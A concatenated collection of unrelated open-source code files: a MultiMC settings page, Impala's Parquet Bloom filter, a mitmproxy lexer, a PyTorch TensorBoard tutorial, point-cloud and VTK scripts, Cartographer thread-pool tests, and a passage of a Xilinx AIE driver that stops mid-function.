QString keyToUse = s->get("PasteEEAPIKey").toString(); if(keyToUse == "multimc") { ui->multimcButton->setChecked(true); } else { ui->customButton->setChecked(true); ui->customAPIkeyEdit->setText(keyToUse); } } void PasteEEPage::applySettings() { auto s = APPLICATION->settings(); QString pasteKeyToUse; if (ui->customButton->isChecked()) pasteKeyToUse = ui->customAPIkeyEdit->text(); else { pasteKeyToUse = "multimc"; } s->set("PasteEEAPIKey", pasteKeyToUse); } bool PasteEEPage::apply() { applySettings(); return true; } void PasteEEPage::textEdited(const QString& text) { ui->customButton->setChecked(true); }
732
746
// Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. // This file is partially a copy of Kudu BlockBloomFilter code. We wanted to reuse the // existing implementation but also extend/modify some parts. This would not have been // possible without modifying the Kudu source code in Impala // (be/src/kudu/util/block_bloom_filter*). On the other hand, we have to maintain binary // compatibility between the the Kudu code in Impala and actual Kudu code, so we decided // against modifying the code in be/src/kudu/util/block_bloom_filter*. #include "parquet-bloom-filter.h" #ifdef __aarch64__ #include "sse2neon.h" #else #include <immintrin.h> #include <mm_malloc.h> #endif #include <cmath> #include <cstdint> #include "gutil/strings/substitute.h" #include "util/cpu-info.h" #include "thirdparty/xxhash/xxhash.h" using namespace std; using strings::Substitute; // TODO: Reconcile with legacy AVX support. DEFINE_bool(disable_parquetbloomfilter_avx2, false, "Disable AVX2 operations in ParquetBloomFilter. This flag has no effect if the " "target CPU doesn't support AVX2 at run-time or ParquetBloomFilter was built with " "a compiler that doesn't support AVX2."); DECLARE_bool(enable_legacy_avx_support); namespace impala { // This is needed to avoid undefined reference errors. constexpr uint64_t ParquetBloomFilter::MAX_BYTES; constexpr uint64_t ParquetBloomFilter::MIN_BYTES; constexpr uint32_t ParquetBloomFilter::SALT[8] __attribute__((aligned(32))); ParquetBloomFilter::ParquetBloomFilter() : log_num_buckets_(0), directory_mask_(0), directory_(nullptr), always_false_(false) { #ifdef USE_AVX2 if (has_avx2()) { bucket_insert_func_ptr_ = &ParquetBloomFilter::BucketInsertAVX2; bucket_find_func_ptr_ = &ParquetBloomFilter::BucketFindAVX2; } else { bucket_insert_func_ptr_ = &ParquetBloomFilter::BucketInsert; bucket_find_func_ptr_ = &ParquetBloomFilter::BucketFind; } #else bucket_insert_func_ptr_ = &ParquetBloomFilter::BucketInsert; bucket_find_func_ptr_ = &ParquetBloomFilter::BucketFind; #endif DCHECK(bucket_insert_func_ptr_); DCHECK(bucket_find_func_ptr_); } ParquetBloomFilter::~ParquetBloomFilter() {} Status ParquetBloomFilter::Init(uint8_t* directory, size_t dir_size, bool always_false) { const int log_space_bytes = std::log2(dir_size); DCHECK_EQ(1ULL << log_space_bytes, dir_size); // Since log_space_bytes is in bytes, we need to convert it to the number of tiny // Bloom filters we will use. log_num_buckets_ = std::max(1, log_space_bytes - kLogBucketByteSize); // Since we use 32 bits in the arguments of Insert() and Find(), log_num_buckets_ // must be limited. if (log_num_buckets_ > 32) { return Status(Substitute("Parquet Bloom filter too large. log_space_bytes: $0", log_space_bytes)); } DCHECK_EQ(directory_size(), dir_size); DCHECK(directory != nullptr); directory_ = reinterpret_cast<Bucket*>(directory); if (always_false) { // Check the assumption that the directory is empty. DCHECK(std::all_of(directory, directory + dir_size, [](uint8_t byte) { return byte == 0; })); always_false_ = true; } // Don't use log_num_buckets_ if it will lead to undefined behavior by a shift // that is too large. directory_mask_ = (1ULL << log_num_buckets_) - 1; return Status::OK(); } void ParquetBloomFilter::Insert(const uint64_t hash) noexcept { always_false_ = false; uint32_t idx = DetermineBucketIdx(hash); uint32_t hash_lower = hash; DCHECK(bucket_insert_func_ptr_); (this->*bucket_insert_func_ptr_)(idx, hash_lower); } void ParquetBloomFilter::HashAndInsert(const uint8_t* input, size_t size) noexcept { const uint64_t hash = Hash(input, size); Insert(hash); } bool ParquetBloomFilter::Find(const uint64_t hash) const noexcept { if (always_false_) return false; uint32_t idx = DetermineBucketIdx(hash); uint32_t hash_lower = hash; DCHECK(bucket_find_func_ptr_); return (this->*bucket_find_func_ptr_)(idx, hash_lower); } bool ParquetBloomFilter::HashAndFind(const uint8_t* input, size_t size) const noexcept { const uint64_t hash = Hash(input, size); return Find(hash); } int ParquetBloomFilter::OptimalByteSize(const size_t ndv, const double fpp) { DCHECK(fpp > 0.0 && fpp < 1.0) << "False positive probability should be less than 1.0 and greater than 0.0"; const int min_log_space = MinLogSpace(ndv, fpp); const int min_space = std::pow(2, min_log_space); if (min_space < MIN_BYTES) return MIN_BYTES; if (min_space > MAX_BYTES) return MAX_BYTES; return min_space; } int ParquetBloomFilter::MinLogSpace(const size_t ndv, const double fpp) { static const double k = kBucketWords; if (0 == ndv) return 0; // m is the number of bits we would need to get the fpp specified const double m = -k * ndv / log(1 - pow(fpp, 1.0 / k)); // Handle case where ndv == 1 => ceil(log2(m/8)) < 0. return std::max(0, static_cast<int>(ceil(log2(m / 8)))); } double ParquetBloomFilter::FalsePositiveProb(const size_t ndv, const int log_space_bytes) { return pow(1 - exp((-1.0 * static_cast<double>(kBucketWords) * static_cast<double>(ndv)) / static_cast<double>(1ULL << (log_space_bytes + 3))), kBucketWords); } uint64_t ParquetBloomFilter::Hash(const uint8_t* input, size_t size) { static_assert(std::is_same<XXH64_hash_t, uint64_t>::value, "XXHash should return a 64 bit integer."); XXH64_hash_t hash = XXH64(input, size, 0 /* seed */); return hash; } ATTRIBUTE_NO_SANITIZE_INTEGER void ParquetBloomFilter::BucketInsert(const uint32_t bucket_idx, const uint32_t hash) noexcept { // new_bucket will be all zeros except for eight 1-bits, one in each 32-bit word. It is // 16-byte aligned so it can be read as a __m128i using aligned SIMD loads in the second // part of this method. uint32_t new_bucket[kBucketWords] __attribute__((aligned(16))); for (int i = 0; i < kBucketWords; ++i) { // Rehash 'hash' and use the top kLogBucketWordBits bits, following Dietzfelbinger. new_bucket[i] = (SALT[i] * hash) >> ((1 << kLogBucketWordBits) - kLogBucketWordBits); new_bucket[i] = 1U << new_bucket[i]; } for (int i = 0; i < 2; ++i) { __m128i new_bucket_sse = _mm_load_si128( reinterpret_cast<__m128i*>(new_bucket + 4 * i)); __m128i* existing_bucket = reinterpret_cast<__m128i*>( &DCHECK_NOTNULL(directory_)[bucket_idx][4 * i]); *existing_bucket = _mm_or_si128(*existing_bucket, new_bucket_sse); } } ATTRIBUTE_NO_SANITIZE_INTEGER bool ParquetBloomFilter::BucketFind( const uint32_t bucket_idx, const uint32_t hash) const noexcept { for (int i = 0; i < kBucketWords; ++i) { BucketWord hval = (SALT[i] * hash) >> ( (1 << kLogBucketWordBits) - kLogBucketWordBits); hval = 1U << hval; if (!(DCHECK_NOTNULL(directory_)[bucket_idx][i] & hval)) { return false; } } return true; } bool ParquetBloomFilter::has_avx2() { return !FLAGS_disable_parquetbloomfilter_avx2 && !FLAGS_enable_legacy_avx_support && CpuInfo::IsSupported(CpuInfo::AVX2); } } // namespace impala
2,874
975
<filename>seleniumwire/thirdparty/mitmproxy/command_lexer.py import ast import re import pyparsing # TODO: There is a lot of work to be done here. # The current implementation is written in a way that _any_ input is valid, # which does not make sense once things get more complex. PartialQuotedString = pyparsing.Regex( re.compile( r''' (["']) # start quote (?: (?:\\.) # escape sequence | (?!\1). # unescaped character that is not our quote nor the begin of an escape sequence. We can't use \1 in [] )* (?:\1|$) # end quote ''', re.VERBOSE ) ) expr = pyparsing.ZeroOrMore( PartialQuotedString | pyparsing.Word(" \r\n\t") | pyparsing.CharsNotIn("""'" \r\n\t""") ).leaveWhitespace() def quote(val: str) -> str: if val and all(char not in val for char in "'\" \r\n\t"): return val return repr(val) # TODO: More of a hack. def unquote(x: str) -> str: quoted = ( (x.startswith('"') and x.endswith('"')) or (x.startswith("'") and x.endswith("'")) ) if quoted: try: x = ast.literal_eval(x) except Exception: x = x[1:-1] return x
622
6,424
""" How to use TensorBoard with PyTorch =================================== TensorBoard is a visualization toolkit for machine learning experimentation. TensorBoard allows tracking and visualizing metrics such as loss and accuracy, visualizing the model graph, viewing histograms, displaying images and much more. In this tutorial we are going to cover TensorBoard installation, basic usage with PyTorch, and how to visualize data you logged in TensorBoard UI. Installation ---------------------- PyTorch should be installed to log models and metrics into TensorBoard log directory. The following command will install PyTorch 1.4+ via Anaconda (recommended): :: $ conda install pytorch torchvision -c pytorch or pip :: $ pip install torch torchvision """ ###################################################################### # Using TensorBoard in PyTorch # ----- # # Let’s now try using TensorBoard with PyTorch! Before logging anything, # we need to create a ``SummaryWriter`` instance. # import torch from torch.utils.tensorboard import SummaryWriter writer = SummaryWriter() ###################################################################### # Writer will output to ``./runs/`` directory by default. # ###################################################################### # Log scalars # ----- # # In machine learning, it’s important to understand key metrics such as # loss and how they change during training. Scalar helps to save # the loss value of each training step, or the accuracy after each epoch. # # To log a scalar value, use # ``add_scalar(tag, scalar_value, global_step=None, walltime=None)``. # For example, lets create a simple linear regression training, and # log loss value using ``add_scalar`` # x = torch.arange(-5, 5, 0.1).view(-1, 1) y = -5 * x + 0.1 * torch.randn(x.size()) model = torch.nn.Linear(1, 1) criterion = torch.nn.MSELoss() optimizer = torch.optim.SGD(model.parameters(), lr = 0.1) def train_model(iter): for epoch in range(iter): y1 = model(x) loss = criterion(y1, y) writer.add_scalar("Loss/train", loss, epoch) optimizer.zero_grad() loss.backward() optimizer.step() train_model(10) writer.flush() ###################################################################### # Call ``flush()`` method to make sure that all pending events # have been written to disk. # # See `torch.utils.tensorboard tutorials <https://pytorch.org/docs/stable/tensorboard.html>`_ # to find more TensorBoard visualization types you can log. # # If you do not need the summary writer anymore, call ``close()`` method. # writer.close() ###################################################################### # Run TensorBoard # ----- # # Install TensorBoard through the command line to visualize data you logged # # :: # # $ pip install tensorboard # # # Now, start TensorBoard, specifying the root log directory you used above. # Argument ``logdir`` points to directory where TensorBoard will look to find # event files that it can display. TensorBoard will recursively walk # the directory structure rooted at logdir, looking for .*tfevents.* files. # # :: # # $ tensorboard --logdir=runs # # Go to the URL it provides OR to `http://localhost:6006/ <http://localhost:6006/>`_ # # .. image:: ../../_static/img/thumbnails/tensorboard_scalars.png # :scale: 40 % # # This dashboard shows how the loss and accuracy change with every epoch. # You can use it to also track training speed, learning rate, and other # scalar values. It’s helpful to compare these metrics across different # training runs to improve your model. # ###################################################################### # Share TensorBoard dashboards # ----- # # `TensorBoard.dev <https://tensorboard.dev/>`_ lets you upload and share # your ML experiment results with anyone. Use TensorBoard.dev to host, # track, and share your TensorBoard dashboards. # # Install the latest version of TensorBoard to use the uploader. # # :: # # $ pip install tensorboard --upgrade # # Use a simple command to upload and share your TensorBoard. # # :: # # $ tensorboard dev upload --logdir runs \ # --name "My latest experiment" \ # optional # --description "Simple comparison of several hyperparameters" # optional # # For help, run ``$ tensorboard dev --help``. # # **Note:** Uploaded TensorBoards are public and visible to everyone. # Do not upload sensitive data. # # View your TensorBoard live at URL provided in your terminal. # E.g. `https://tensorboard.dev/experiment/AdYd1TgeTlaLWXx6I8JUbA <https://tensorboard.dev/experiment/AdYd1TgeTlaLWXx6I8JUbA>`_ # # # .. image:: ../../_static/img/thumbnails/tensorboard_dev.png # :scale: 40 % # # # .. note:: # TensorBoard.dev currently supports scalars, graphs, histograms, distributions, hparams, and text dashboards. ######################################################################## # Learn More # ---------------------------- # # - `torch.utils.tensorboard <https://pytorch.org/docs/stable/tensorboard.html>`_ docs # - `Visualizing models, data, and training with TensorBoard <https://pytorch.org/tutorials/intermediate/tensorboard_tutorial.html>`_ tutorial #
1,580
1,310
<filename>data_conversions/prepare_scannet_cls_data.py<gh_stars>1000+ #!/usr/bin/python3 '''Convert ScanNet pts to h5.''' from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import h5py import argparse import numpy as np from datetime import datetime def main(): parser = argparse.ArgumentParser() parser.add_argument('--folder', '-f', help='Path to data folder') args = parser.parse_args() print(args) batch_size = 2048 sample_num = 2048 folder_scanenet = args.folder if args.folder else '../../data/scannet/cls' train_test_folders = ['train', 'test'] label_list = [] for folder in train_test_folders: folder_pts = os.path.join(folder_scanenet, folder, 'pts') for filename in os.listdir(folder_pts): label_list.append(int(filename[:-4].split('_')[-1])) label_list = sorted(set(label_list)) print('label_num:', len(label_list)) label_dict = dict() for idx, label in enumerate(label_list): label_dict[label] = idx data = np.zeros((batch_size, sample_num, 6)) label = np.zeros((batch_size), dtype=np.int32) for folder in train_test_folders: folder_pts = os.path.join(folder_scanenet, folder, 'pts') idx_h5 = 0 filename_filelist_h5 = os.path.join(folder_scanenet, '%s_files.txt' % folder) with open(filename_filelist_h5, 'w') as filelist_h5: filelist = os.listdir(folder_pts) for idx_pts, filename in enumerate(filelist): label_object = label_dict[int(filename[:-4].split('_')[-1])] filename_pts = os.path.join(folder_pts, filename) xyzrgbs = np.array([[float(value) for value in xyzrgb.split(' ')] for xyzrgb in open(filename_pts, 'r') if len(xyzrgb.split(' ')) == 6]) np.random.shuffle(xyzrgbs) pt_num = xyzrgbs.shape[0] indices = np.random.choice(pt_num, sample_num, replace=(pt_num < sample_num)) points_array = xyzrgbs[indices] points_array[..., 3:] = points_array[..., 3:]/255 - 0.5 # normalize colors idx_in_batch = idx_pts % batch_size data[idx_in_batch, ...] = points_array label[idx_in_batch] = label_object if ((idx_pts + 1) % batch_size == 0) or idx_pts == len(filelist) - 1: item_num = idx_in_batch + 1 filename_h5 = os.path.join(folder_scanenet, '%s_%d.h5' % (folder, idx_h5)) print('{}-Saving {}...'.format(datetime.now(), filename_h5)) filelist_h5.write('./%s_%d.h5\n' % (folder, idx_h5)) file = h5py.File(filename_h5, 'w') file.create_dataset('data', data=data[0:item_num, ...]) file.create_dataset('label', data=label[0:item_num, ...]) file.close() idx_h5 = idx_h5 + 1 if __name__ == '__main__': main()
1,505
309
#!/usr/bin/env python import vtk def main(): fileName = get_program_parameters() colors = vtk.vtkNamedColors() # Create the RenderWindow, Renderer and Interactor. # ren1 = vtk.vtkRenderer() renWin = vtk.vtkRenderWindow() renWin.AddRenderer(ren1) iren = vtk.vtkRenderWindowInteractor() iren.SetRenderWindow(renWin) # Create the pipeline. # reader = vtk.vtkMetaImageReader() reader.SetFileName(fileName) reader.Update() extractVOI = vtk.vtkExtractVOI() extractVOI.SetInputConnection(reader.GetOutputPort()) extractVOI.SetVOI(0, 255, 0, 255, 45, 45) iso = vtk.vtkContourFilter() iso.SetInputConnection(extractVOI.GetOutputPort()) iso.GenerateValues(12, 500, 1150) isoMapper = vtk.vtkPolyDataMapper() isoMapper.SetInputConnection(iso.GetOutputPort()) isoMapper.ScalarVisibilityOff() isoActor = vtk.vtkActor() isoActor.SetMapper(isoMapper) isoActor.GetProperty().SetColor(colors.GetColor3d("Wheat")) outline = vtk.vtkOutlineFilter() outline.SetInputConnection(extractVOI.GetOutputPort()) outlineMapper = vtk.vtkPolyDataMapper() outlineMapper.SetInputConnection(outline.GetOutputPort()) outlineActor = vtk.vtkActor() outlineActor.SetMapper(outlineMapper) # Add the actors to the renderer, set the background and size. # ren1.AddActor(outlineActor) ren1.AddActor(isoActor) ren1.SetBackground(colors.GetColor3d("SlateGray")) ren1.ResetCamera() ren1.GetActiveCamera().Dolly(1.5) ren1.ResetCameraClippingRange() renWin.SetSize(640, 480) renWin.Render() iren.Start() def get_program_parameters(): import argparse description = 'Marching squares are used to generate contour lines.' epilogue = ''' ''' parser = argparse.ArgumentParser(description=description, epilog=epilogue, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument('filename', help='FullHead.mhd.') args = parser.parse_args() return args.filename if __name__ == '__main__': main()
847
474
#include "ChromeDevTools.h" #include <V8JsiRuntime.h> #include <Babylon/JsRuntime.h> namespace Babylon::Plugins { class ChromeDevTools::Impl final : public std::enable_shared_from_this<ChromeDevTools::Impl> { public: explicit Impl(Napi::Env env) : m_env(env) { JsRuntime::GetFromJavaScript(env).Dispatch([this](Napi::Env env) { m_runtime = JsRuntime::NativeObject::GetFromJavaScript(env).Get("_JSIRuntime").As<Napi::External<facebook::jsi::Runtime>>().Data(); }); } ~Impl() { } bool SupportsInspector() { return true; } void StartInspector(const unsigned short, const std::string&) { JsRuntime::GetFromJavaScript(m_env).Dispatch([this](Napi::Env) { if (m_runtime != nullptr) { v8runtime::openInspector(*m_runtime); } }); } void StopInspector() { } private: facebook::jsi::Runtime* m_runtime; Napi::Env m_env; }; ChromeDevTools ChromeDevTools::Initialize(Napi::Env env) { return {std::make_shared<ChromeDevTools::Impl>(env)}; } ChromeDevTools::ChromeDevTools(std::shared_ptr<ChromeDevTools::Impl> impl) : m_impl{std::move(impl)} { } bool ChromeDevTools::SupportsInspector() const { return m_impl->SupportsInspector(); } /* Note: V8JSI doesn't currently support setting the port or appName at runtime. For now the port is set to 5643 in AppRuntimeJSI.cpp. */ void ChromeDevTools::StartInspector(const unsigned short port, const std::string& appName) const { m_impl->StartInspector(port, appName); } /* Note: V8JSI doesn't currently have a method for stopping the inspector at runtime. */ void ChromeDevTools::StopInspector() const { m_impl->StopInspector(); } }
1,059
5,196
/* * Copyright 2018 The Cartographer Authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include "cartographer/common/thread_pool.h" #include <vector> #include "absl/memory/memory.h" #include "gtest/gtest.h" namespace cartographer { namespace common { namespace { class Receiver { public: void Receive(int number) { absl::MutexLock locker(&mutex_); received_numbers_.push_back(number); } void WaitForNumberSequence(const std::vector<int>& expected_numbers) { const auto predicate = [this, &expected_numbers]() EXCLUSIVE_LOCKS_REQUIRED(mutex_) { return (received_numbers_.size() >= expected_numbers.size()); }; absl::MutexLock locker(&mutex_); mutex_.Await(absl::Condition(&predicate)); EXPECT_EQ(expected_numbers, received_numbers_); } absl::Mutex mutex_; std::vector<int> received_numbers_ GUARDED_BY(mutex_); }; TEST(ThreadPoolTest, RunTask) { ThreadPool pool(1); Receiver receiver; auto task = absl::make_unique<Task>(); task->SetWorkItem([&receiver]() { receiver.Receive(1); }); pool.Schedule(std::move(task)); receiver.WaitForNumberSequence({1}); } TEST(ThreadPoolTest, ManyTasks) { for (int a = 0; a < 5; ++a) { ThreadPool pool(3); Receiver receiver; int kNumTasks = 10; for (int i = 0; i < kNumTasks; ++i) { auto task = absl::make_unique<Task>(); task->SetWorkItem([&receiver]() { receiver.Receive(1); }); pool.Schedule(std::move(task)); } receiver.WaitForNumberSequence(std::vector<int>(kNumTasks, 1)); } } TEST(ThreadPoolTest, RunWithDependency) { ThreadPool pool(2); Receiver receiver; auto task_2 = absl::make_unique<Task>(); task_2->SetWorkItem([&receiver]() { receiver.Receive(2); }); auto task_1 = absl::make_unique<Task>(); task_1->SetWorkItem([&receiver]() { receiver.Receive(1); }); auto weak_task_1 = pool.Schedule(std::move(task_1)); task_2->AddDependency(weak_task_1); pool.Schedule(std::move(task_2)); receiver.WaitForNumberSequence({1, 2}); } TEST(ThreadPoolTest, RunWithOutOfScopeDependency) { ThreadPool pool(2); Receiver receiver; auto task_2 = absl::make_unique<Task>(); task_2->SetWorkItem([&receiver]() { receiver.Receive(2); }); { auto task_1 = absl::make_unique<Task>(); task_1->SetWorkItem([&receiver]() { receiver.Receive(1); }); auto weak_task_1 = pool.Schedule(std::move(task_1)); task_2->AddDependency(weak_task_1); } pool.Schedule(std::move(task_2)); receiver.WaitForNumberSequence({1, 2}); } TEST(ThreadPoolTest, ManyDependencies) { for (int a = 0; a < 5; ++a) { ThreadPool pool(5); Receiver receiver; int kNumDependencies = 10; auto task = absl::make_unique<Task>(); task->SetWorkItem([&receiver]() { receiver.Receive(1); }); for (int i = 0; i < kNumDependencies; ++i) { auto dependency_task = absl::make_unique<Task>(); dependency_task->SetWorkItem([]() {}); task->AddDependency(pool.Schedule(std::move(dependency_task))); } pool.Schedule(std::move(task)); receiver.WaitForNumberSequence({1}); } } TEST(ThreadPoolTest, ManyDependants) { for (int a = 0; a < 5; ++a) { ThreadPool pool(5); Receiver receiver; int kNumDependants = 10; auto dependency_task = absl::make_unique<Task>(); dependency_task->SetWorkItem([]() {}); auto dependency_handle = pool.Schedule(std::move(dependency_task)); for (int i = 0; i < kNumDependants; ++i) { auto task = absl::make_unique<Task>(); task->AddDependency(dependency_handle); task->SetWorkItem([&receiver]() { receiver.Receive(1); }); pool.Schedule(std::move(task)); } receiver.WaitForNumberSequence(std::vector<int>(kNumDependants, 1)); } } TEST(ThreadPoolTest, RunWithMultipleDependencies) { ThreadPool pool(2); Receiver receiver; auto task_1 = absl::make_unique<Task>(); task_1->SetWorkItem([&receiver]() { receiver.Receive(1); }); auto task_2a = absl::make_unique<Task>(); task_2a->SetWorkItem([&receiver]() { receiver.Receive(2); }); auto task_2b = absl::make_unique<Task>(); task_2b->SetWorkItem([&receiver]() { receiver.Receive(2); }); auto task_3 = absl::make_unique<Task>(); task_3->SetWorkItem([&receiver]() { receiver.Receive(3); }); /* -> task_2a \ * task_1 /-> task_2b --> task_3 */ auto weak_task_1 = pool.Schedule(std::move(task_1)); task_2a->AddDependency(weak_task_1); auto weak_task_2a = pool.Schedule(std::move(task_2a)); task_3->AddDependency(weak_task_1); task_3->AddDependency(weak_task_2a); task_2b->AddDependency(weak_task_1); auto weak_task_2b = pool.Schedule(std::move(task_2b)); task_3->AddDependency(weak_task_2b); pool.Schedule(std::move(task_3)); receiver.WaitForNumberSequence({1, 2, 2, 3}); } TEST(ThreadPoolTest, RunWithFinishedDependency) { ThreadPool pool(2); Receiver receiver; auto task_1 = absl::make_unique<Task>(); task_1->SetWorkItem([&receiver]() { receiver.Receive(1); }); auto task_2 = absl::make_unique<Task>(); task_2->SetWorkItem([&receiver]() { receiver.Receive(2); }); auto weak_task_1 = pool.Schedule(std::move(task_1)); task_2->AddDependency(weak_task_1); receiver.WaitForNumberSequence({1}); pool.Schedule(std::move(task_2)); receiver.WaitForNumberSequence({1, 2}); } } // namespace } // namespace common } // namespace cartographer
2,252
595
/****************************************************************************** * Copyright (C) 2018 - 2020 Xilinx, Inc. All rights reserved. * SPDX-License-Identifier: MIT ******************************************************************************/ /*****************************************************************************/ /** * @file xaielib.c * @{ * * This file contains the low level layer interface of the AIE driver with the * definitions for the memory write and read operations. * * <pre> * MODIFICATION HISTORY: * * Ver Who Date Changes * ----- ------ -------- ----------------------------------------------------- * 1.0 Naresh 03/23/2018 Initial creation * 1.1 Naresh 05/23/2018 Added bare-metal BSP support * 1.2 Naresh 06/18/2018 Updated code as per standalone driver framework * 1.3 Naresh 07/11/2018 Updated copyright info * 1.4 Hyun 10/10/2018 Added the mask write API * 1.5 Hyun 10/11/2018 Don't include the xaieio header for sim build * 1.6 Hyun 10/16/2018 Added the baremetal compile switch everywhere * it's needed * 1.7 Hyun 11/14/2018 Move platform dependent code to xaielib.c * 1.8 Nishad 12/05/2018 Renamed ME attributes to AIE * 1.9 Hyun 01/08/2019 Implement 128bit IO operations for baremetal * 2.0 Hyun 01/08/2019 Add XAieLib_MaskPoll() * 2.1 Hyun 04/05/2019 NPI support for simulation * 2.2 Nishad 05/16/2019 Fix deallocation of pointer not on heap MISRA-c * mandatory violation * 2.3 Nishad 08/07/2019 Remove OS specific gaurd from XAieLib_usleep API * 2.4 Hyun 09/13/2019 Use the simulation elf loader function * 2.5 Hyun 09/13/2019 Use XAieSim_LoadElfMem() * 2.6 Tejus 10/14/2019 Enable assertion for linux and simulation * 2.7 Wendy 02/25/2020 Add logging API * 2.8 Tejus 04/17/2020 Fix variable overflow issue. * </pre> * ******************************************************************************/ #include "xaiegbl_defs.h" #include "xaielib.h" #include "xaielib_npi.h" #include <stdarg.h> #include <stdio.h> #include <string.h> #ifdef __AIESIM__ /* AIE simulator */ #include <assert.h> #include <errno.h> #include "xaiesim.h" #elif defined __AIEBAREMTL__ /* Bare-metal application */ #include "xil_types.h" #include "xil_io.h" #include "xil_assert.h" #include "xil_exception.h" #include "xil_printf.h" #include "xil_cache.h" #include "xstatus.h" #include "sleep.h" #include <stdlib.h> #else /* Non-baremetal application, ex Linux */ #include <assert.h> #include <errno.h> #include <unistd.h> #include "xaieio.h" #include "xaietile_proc.h" #include "xaiesim.h" #include "xaiesim_elfload.h" #endif /***************************** Include Files *********************************/ /***************************** Macro Definitions *****************************/ /* * Default heap size in baremetal bsp is 0x2000. Use half of it unless * specified. */ #ifndef XAIELIB_BAREMTL_DEF_MEM_SIZE #define XAIELIB_BAREMTL_DEF_MEM_SIZE (0x1000) #endif /* Address should be aligned at 128 bit / 16 bytes */ #define XAIELIB_SHIM_MEM_ALIGN 16 /************************** Variable Definitions *****************************/ typedef struct XAieLib_MemInst { u64 Size; /**< Size */ u64 Vaddr; /**< Virtual address */ u64 Paddr; /**< Device / physical address */ void *Platform; /**< Platform specific data */ } XAieLib_MemInst; #ifdef __linux__ static FILE *XAieLib_LogFPtr; /**< Pointer to Log file pointer. */ #endif /************************** Function Definitions *****************************/ /*****************************************************************************/ /** * * This asserts if the condition doesn't meet. * * @param Cond: Condition to meet. Should be 0 or 1. * * @return 0 * * @note None. * *******************************************************************************/ u32 XAieLib_AssertNonvoid(u8 Cond, const char *func, const u32 line) { if(!Cond) XAieLib_print("Assert: %s, line %d\n", func, line); #ifdef __AIEBAREMTL__ Xil_AssertNonvoid(Cond); #else assert(Cond); #endif return 0; } /*****************************************************************************/ /** * * This asserts if the condition doesn't meet. Can be used for void return * function. * * @param Cond: Condition to meet. Should be 0 or 1. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_AssertVoid(u8 Cond, const char *func, const u32 line) { if(!Cond) XAieLib_print("Assert: %s, line %d\n", func, line); #ifdef __AIEBAREMTL__ Xil_AssertVoid(Cond); #else assert(Cond); #endif } /*****************************************************************************/ /** * * This provides to sleep in micro seconds. * * @param Usec: Micro seconds to sleep * * @return 0 for success, and -1 for error.. * * @note None. * *******************************************************************************/ int XAieLib_usleep(u64 Usec) { #ifdef __AIESIM__ return XAieSim_usleep(Usec); #else /** * FIXME: Platform implementation of usleep() API, returns void when it * is expected to return SUCCESS/FAILURE code. Instead of returning a * zero, this API must return SUCCESS/FAILURE code when usleep API is * fixed. */ usleep(Usec); return 0; #endif } /*****************************************************************************/ /** * * This API loads the elf to corresponding tile * * @param TileInstPtr: Tile instance for the elf to be loaded * @param ElfPtr: path to the elf file * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE * * @note None. * *******************************************************************************/ u32 XAieLib_LoadElf(XAieGbl_Tile *TileInstPtr, u8 *ElfPtr, u8 LoadSym) { #ifdef __AIESIM__ return XAieSim_LoadElf(TileInstPtr, ElfPtr, LoadSym); #elif defined __AIEBAREMTL__ return XAIELIB_FAILURE; #else /* Use the simulation elf load to workaround the elf loader issue. */ return XAieSim_LoadElf(TileInstPtr, ElfPtr, LoadSym); #endif } /*****************************************************************************/ /** * * This API loads the elf to corresponding tile * * @param TileInstPtr: Tile instance for the elf to be loaded * @param ElfPtr: pointer to the elf in memory * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE * * @note None. * *******************************************************************************/ u32 XAieLib_LoadElfMem(XAieGbl_Tile *TileInstPtr, u8 *ElfPtr, u8 LoadSym) { #ifdef __AIESIM__ return XAIELIB_FAILURE; #elif defined __AIEBAREMTL__ return XAIELIB_FAILURE; #else return XAieSim_LoadElfMem(TileInstPtr, ElfPtr, LoadSym); #endif } /*****************************************************************************/ /** * * This API initializes the platform specific device instance if needed * * @param None. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_InitDev(void) { #ifdef __AIESIM__ #elif defined __AIEBAREMTL__ #else XAieIO_Init(); #endif } /*****************************************************************************/ /** * * This API initializes the platform specific tile instance if needed * * @param TileInstPtr: Tile instance to be initialized * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE. * * @note If there's no platform specific initialization, * return XAIELIB_SUCCESS. * *******************************************************************************/ u32 XAieLib_InitTile(XAieGbl_Tile *TileInstPtr) { #ifdef __AIESIM__ return XAIELIB_SUCCESS; #elif defined __AIEBAREMTL__ return XAIELIB_SUCCESS; #else return XAieTileProc_Init(TileInstPtr); #endif } /*****************************************************************************/ /** * * This API unregisters the interrupt. * * @param Offest: Should be 1 - 3. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_InterruptUnregisterIsr(int Offset) { #ifdef __AIESIM__ return; #elif defined __AIEBAREMTL__ return; #else XAieIO_IntrUnregisterIsr(Offset); #endif } /*****************************************************************************/ /** * * This API registers the handler for interrupt * * @param Offset: The value should one of 1 - 3. * @param Handler: the callback to be called upon interrupt. * @param Data: the data to be used with the handler. * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE. * * @note None. * *******************************************************************************/ int XAieLib_InterruptRegisterIsr(int Offset, int (*Handler) (void *Data), void *Data) { #ifdef __AIESIM__ return XAIELIB_FAILURE; #elif defined __AIEBAREMTL__ return XAIELIB_FAILURE; #else return XAieIO_IntrRegisterIsr(Offset, Handler, Data); #endif } /*****************************************************************************/ /** * * This API enables AIE interrupt * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_InterruptEnable(void) { #ifdef __AIESIM__ return; #elif defined 